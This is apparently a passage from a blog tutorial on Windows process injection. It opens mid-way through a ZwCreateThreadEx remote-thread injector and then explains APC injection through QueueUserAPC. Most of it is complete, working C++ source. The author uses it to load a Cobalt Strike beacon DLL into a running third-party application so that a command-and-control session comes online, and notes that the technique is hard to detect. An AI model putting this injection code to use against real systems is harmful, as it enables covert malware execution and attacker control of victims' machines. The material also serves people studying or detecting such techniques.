    typedef DWORD (WINAPI *typedef_ZwCreateThreadEx)(
        PHANDLE ThreadHandle,
        ACCESS_MASK DesiredAccess,
        LPVOID ObjectAttributes,
        HANDLE ProcessHandle,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID lpParameter,
        ULONG CreateThreadFlags,
        SIZE_T ZeroBits,
        SIZE_T StackSize,
        SIZE_T MaximumStackSize,
        LPVOID pUnkown);
#else
    typedef DWORD (WINAPI *typedef_ZwCreateThreadEx)(
        PHANDLE ThreadHandle,
        ACCESS_MASK DesiredAccess,
        LPVOID ObjectAttributes,
        HANDLE ProcessHandle,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID lpParameter,
        BOOL CreateSuspended,
        DWORD dwStackSize,
        DWORD dw1,
        DWORD dw2,
        LPVOID pUnkown);
#endif

    // Get the address of ZwCreateThreadEx
    typedef_ZwCreateThreadEx ZwCreateThreadEx = (typedef_ZwCreateThreadEx)::GetProcAddress(hNtdllDll, "ZwCreateThreadEx");
    if (NULL == ZwCreateThreadEx)
    {
        ShowError("GetProcAddress_ZwCreateThread - Error! \n\n");
        return FALSE;
    }

    // Create the remote thread; the seventh parameter is 0
    dwStatus = ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)pFuncProcAddr, pDllAddr, 0, 0, 0, 0, NULL);
    if (NULL == hRemoteThread)
    {
        ShowError("ZwCreateThreadEx - Error! \n\n");
        return FALSE;
    }

    // Close the handles
    ::CloseHandle(hProcess);
    ::FreeLibrary(hNtdllDll);
    return TRUE;
}

int main(int argc, char *argv[])
{
    // The same call is used for 32-bit and 64-bit builds
    BOOL bRet = ZwCreateThreadExInjectDll(4924, "C:\\Users\\61408\\Desktop\\artifact.dll");
    if (FALSE == bRet)
    {
        printf("Inject Dll Error! \n\n");
        return 1;
    }
    printf("Inject Dll OK! \n\n");
    return 0;
}

Since a MessageBox cannot be seen when injecting into such a process, I use a DLL generated by CS for testing instead. If the injection succeeds, the session comes online.

First generate a 32-bit DLL file. The bitness must match the target: I chose to inject into a 32-bit process, so I generate a 32-bit DLL.

Get the path

Here I choose Youdao Cloud Note as the injection target and look up its PID

Then change the PID in our code to that of Youdao Cloud Note

The implementation effect is shown below

APC injection

An Asynchronous Procedure Call (APC) refers to a function being executed asynchronously in a particular thread. In an operating system, APC is a concurrency mechanism.

Here is a look at the interpretation of asynchronous procedure calls in MSDN

So let’s start with the first function

QueueUserAPC: adds an asynchronous procedure call (a callback function) to the APC queue of the specified thread.

APCProc: the callback function that the APC executes.

Adding an APC to a thread's APC queue generates a soft interrupt, and the APC function is executed the next time the thread is scheduled. APCs come in two forms: those generated by the system are called kernel-mode APCs, and those generated by applications are called user-mode APCs. This section deals with user-mode APCs. An APC inserts a callback function into a thread, but the callback is only invoked under certain conditions, as described in MSDN.

The core function

QueueUserAPC

DWORD QueueUserAPC(
  PAPCFUNC  pfnAPC,    // APC function
  HANDLE    hThread,   // handle to thread
  ULONG_PTR dwData     // APC function parameter
);

The first argument of QueueUserAPC is the address of the function to execute when the APC is delivered. The second argument is the handle of the thread whose queue receives the APC; the handle must have THREAD_SET_CONTEXT access. The third argument is the value passed to that function. As with remote thread injection, DLL injection is achieved by passing the address of LoadLibraryA as the first argument and the DLL path as the third.

How it works

In Windows, each thread maintains its own APC queue, which records the APC functions the thread is asked to run; QueueUserAPC adds an APC function to the queue of the specified thread. Windows issues a soft interrupt to execute these functions. User-mode APCs are executed only when the thread is in an alertable state, which a thread enters when it suspends itself with an alertable call to SignalObjectAndWait, SleepEx, WaitForSingleObjectEx, WaitForMultipleObjectsEx, and similar functions.

Generally speaking, the process can be divided into the following steps:

1) A software interrupt is generated when a thread in the EXE is executing SleepEx() or WaitForSingleObjectEx().

2) When the thread is woken up again, it first executes the functions registered in its APC queue.

3) The QueueUserAPC() API is used to insert a function pointer into the thread's APC queue during the soft interrupt. If the pointer we insert is LoadLibrary(), we can inject a DLL.

However, there are two conditions for using APC injection:

1. It must be in a multi-threaded environment

2. The target program must call one of the wait functions listed above, so that its threads enter an alertable state

Every thread of every process has its own APC queue, and QueueUserAPC pushes an APC function onto it. When a user-mode APC is pushed onto a thread's queue, the thread does not run it immediately; it runs it only once the thread is in an alertable state. The queued functions then run in ordinary queue order, first in, first out (FIFO). Throughout this process the thread shows no abnormal behavior, so the technique is not easy to detect. The disadvantage is that single-threaded programs generally have no such waiting state, so APC injection has little effect on that kind of program.

The implementation process

The general idea is to write one function that gets the PID from the process name and another that gets all thread IDs from the PID. Here I simplify this: the PID is typed in by hand, and the function below collects the thread IDs of that process into an array.

BOOL GetProcessThreadList(DWORD th32ProcessID, DWORD** ppThreadIdList, LPDWORD pThreadIdListLength)
{
    DWORD dwThreadIdListLength = 0;
    DWORD dwThreadIdListMaxCount = 2000;
    LPDWORD pThreadIdList = NULL;
    HANDLE hThreadSnap = INVALID_HANDLE_VALUE;

    // Buffer that receives up to dwThreadIdListMaxCount thread IDs
    pThreadIdList = (LPDWORD)VirtualAlloc(NULL, dwThreadIdListMaxCount * sizeof(DWORD), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (pThreadIdList == NULL)
    {
        return FALSE;
    }
    RtlZeroMemory(pThreadIdList, dwThreadIdListMaxCount * sizeof(DWORD));

    THREADENTRY32 th32 = { 0 };

    // TH32CS_SNAPTHREAD snapshots every thread in the system, so the owner PID is filtered below
    hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, th32ProcessID);
    if (hThreadSnap == INVALID_HANDLE_VALUE)
    {
        VirtualFree(pThreadIdList, 0, MEM_RELEASE);
        return FALSE;
    }

    // dwSize must be set before calling Thread32First
    th32.dwSize = sizeof(THREADENTRY32);
    BOOL bRet = Thread32First(hThreadSnap, &th32);
    while (bRet)
    {
        if (th32.th32OwnerProcessID == th32ProcessID)
        {
            if (dwThreadIdListLength >= dwThreadIdListMaxCount)
            {
                break;
            }
            pThreadIdList[dwThreadIdListLength++] = th32.th32ThreadID;
        }
        bRet = Thread32Next(hThreadSnap, &th32);
    }
    CloseHandle(hThreadSnap);

    *pThreadIdListLength = dwThreadIdListLength;
    *ppThreadIdList = pThreadIdList;
    return TRUE;
}

Next comes the main function for APC injection, which first allocates memory remotely using VirtualAllocEx

lpAddr = ::VirtualAllocEx(hProcess, nullptr, page_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

Then write the DLL path to memory using WriteProcessMemory

// Write the path including its terminating NUL byte
::WriteProcessMemory(hProcess, lpAddr, wzDllFullPath, strlen(wzDllFullPath) + 1, nullptr)

Get the address of LoadLibraryA

PVOID loadLibraryAddress = (PVOID)::GetProcAddress(::GetModuleHandleA("kernel32.dll"), "LoadLibraryA");

Then iterate over the threads and queue the APC to each one. QueueUserAPC returns 0 on failure; in that case the fail counter is incremented

for (int i = dwThreadIdListLength - 1; i >= 0; i--)
{
    HANDLE hThread = ::OpenThread(THREAD_ALL_ACCESS, FALSE, pThreadIdList[i]);
    if (hThread)
    {
        // Insert the APC
        if (!::QueueUserAPC((PAPCFUNC)loadLibraryAddress, hThread, (ULONG_PTR)lpAddr))
        {
            fail++;
        }
        // Close the thread handle
        ::CloseHandle(hThread);
    }
}

Then, in the main function, define the DLL path

strcpy_s(wzDllFullPath, "C:\\Users\\61408\\Desktop\\artifact.dll");

Open a handle to the target process using OpenProcess

HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, ulProcessID);

Call the APCInject function you wrote earlier to implement APC injection

if ( ! APCInject ( hProcess , wzDllFullPath , pThreadIdList , dwThreadIdListLength ))
    {
        printf ( "Failed to inject DLL\n" );
        return FALSE ;
    } 

The complete code is as follows

// apcinject.cpp: This file contains the "main" function. Program execution begins and ends at this point.
//

#include <cstdio>
#include <cstring>
#include <iostream>
#include <Windows.h>
#include <TlHelp32.h>
using namespace std;

void ShowError(const char* pszText)
{
    char szError[MAX_PATH] = { 0 };
    ::wsprintfA(szError, "%s Error[%d]\n", pszText, ::GetLastError());
    ::MessageBoxA(NULL, szError, "ERROR", MB_OK);
}

// List all threads of the specified process
BOOL GetProcessThreadList(DWORD th32ProcessID, DWORD** ppThreadIdList, LPDWORD pThreadIdListLength)
{
    DWORD dwThreadIdListLength = 0;
    DWORD dwThreadIdListMaxCount = 2000;
    LPDWORD pThreadIdList = NULL;
    HANDLE hThreadSnap = INVALID_HANDLE_VALUE;

    // Buffer that receives up to dwThreadIdListMaxCount thread IDs
    pThreadIdList = (LPDWORD)VirtualAlloc(NULL, dwThreadIdListMaxCount * sizeof(DWORD), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (pThreadIdList == NULL)
    {
        return FALSE;
    }
    RtlZeroMemory(pThreadIdList, dwThreadIdListMaxCount * sizeof(DWORD));

    THREADENTRY32 th32 = { 0 };

    // TH32CS_SNAPTHREAD snapshots every thread in the system, so the owner PID is filtered below
    hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, th32ProcessID);
    if (hThreadSnap == INVALID_HANDLE_VALUE)
    {
        VirtualFree(pThreadIdList, 0, MEM_RELEASE);
        return FALSE;
    }

    // dwSize must be set before calling Thread32First
    th32.dwSize = sizeof(THREADENTRY32);
    BOOL bRet = Thread32First(hThreadSnap, &th32);
    while (bRet)
    {
        if (th32.th32OwnerProcessID == th32ProcessID)
        {
            if (dwThreadIdListLength >= dwThreadIdListMaxCount)
            {
                break;
            }
            pThreadIdList[dwThreadIdListLength++] = th32.th32ThreadID;
        }
        bRet = Thread32Next(hThreadSnap, &th32);
    }
    CloseHandle(hThreadSnap);

    *pThreadIdListLength = dwThreadIdListLength;
    *ppThreadIdList = pThreadIdList;
    return TRUE;
}

BOOL APCInject(HANDLE hProcess, CHAR* wzDllFullPath, LPDWORD pThreadIdList, DWORD dwThreadIdListLength)
{
    // Allocate memory in the target process
    PVOID lpAddr = NULL;
    SIZE_T page_size = 4096;
    lpAddr = ::VirtualAllocEx(hProcess, nullptr, page_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (lpAddr == NULL)
    {
        ShowError("VirtualAllocEx - Error\n\n");
        CloseHandle(hProcess);
        return FALSE;
    }

    // Copy the DLL path, including its terminating NUL byte, into that memory
    if (FALSE == ::WriteProcessMemory(hProcess, lpAddr, wzDllFullPath, strlen(wzDllFullPath) + 1, nullptr))
    {
        ShowError("WriteProcessMemory - Error\n\n");
        VirtualFreeEx(hProcess, lpAddr, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return FALSE;
    }

    // Get the address of LoadLibraryA
    PVOID loadLibraryAddress = (PVOID)::GetProcAddress(::GetModuleHandleA("kernel32.dll"), "LoadLibraryA");

    // Iterate over the threads and insert the APC
    DWORD fail = 0;
    for (int i = dwThreadIdListLength - 1; i >= 0; i--)
    {
        HANDLE hThread = ::OpenThread(THREAD_ALL_ACCESS, FALSE, pThreadIdList[i]);
        if (hThread)
        {
            // Insert the APC
            if (!::QueueUserAPC((PAPCFUNC)loadLibraryAddress, hThread, (ULONG_PTR)lpAddr))
            {
                fail++;
            }
            // Close the thread handle
            ::CloseHandle(hThread);
            hThread = NULL;
        }
    }

    printf("Total Thread: %d\n", dwThreadIdListLength);
    printf("Total Failed: %d\n", (int)fail);

    // Treat the attempt as successful when fewer than half of the threads rejected the APC
    if (fail == 0 || (float)fail / dwThreadIdListLength < 0.5f)
    {
        printf("Success to Inject APC\n");
        return TRUE;
    }
    else
    {
        printf("Inject may be failed\n");
        return FALSE;
    }
}

int main()
{
    ULONG32 ulProcessID = 0;
    printf("Input the Process ID:");
    cin >> ulProcessID;

    CHAR wzDllFullPath[MAX_PATH] = { 0 };
    LPDWORD pThreadIdList = NULL;
    DWORD dwThreadIdListLength = 0;

#ifndef _WIN64
    strcpy_s(wzDllFullPath, "C:\\Users\\61408\\Desktop\\artifact.dll");
#else // _WIN64
    strcpy_s(wzDllFullPath, "C:\\Users\\61408\\Desktop\\artifact.dll");
#endif

    if (!GetProcessThreadList(ulProcessID, &pThreadIdList, &dwThreadIdListLength))
    {
        printf("Can not list the threads\n");
        exit(0);
    }

    // Open a handle to the target process
    HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, ulProcessID);
    if (hProcess == NULL)
    {
        printf("Failed to open Process\n");
        return FALSE;
    }

    // Inject
    if (!APCInject(hProcess, wzDllFullPath, pThreadIdList, dwThreadIdListLength))
    {
        printf("Failed to inject DLL\n");
        return FALSE;
    }

    VirtualFree(pThreadIdList, 0, MEM_RELEASE);
    CloseHandle(hProcess);
    return 0;
}

Instead of resolving the process name to a PID, I enter the PID by hand and read it into ulProcessID with cin >> ulProcessID

For testing you could write a DLL that simply pops up a MessageBox; here I use the CS DLL directly. The demo effect is shown below